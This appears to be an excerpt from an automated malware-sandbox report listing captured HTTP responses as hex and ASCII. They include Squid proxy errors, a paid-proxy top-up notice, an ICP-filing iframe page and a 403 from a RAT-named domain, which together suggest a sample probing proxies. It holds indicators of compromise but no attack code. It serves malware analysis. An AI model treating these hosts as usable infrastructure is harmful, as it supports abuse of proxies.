Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:15:03 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.14Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:03 GMTContent-Type: text/html;charset=utf-8Content-Length: 3846X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:03 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:03 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:03 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service Unavailable
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:15:04 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:04 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.14Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:42 GMTContent-Type: text/html;charset=utf-8Content-Length: 3846X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.3.8Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:00 GMTContent-Type: text/htmlContent-Length: 3556X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 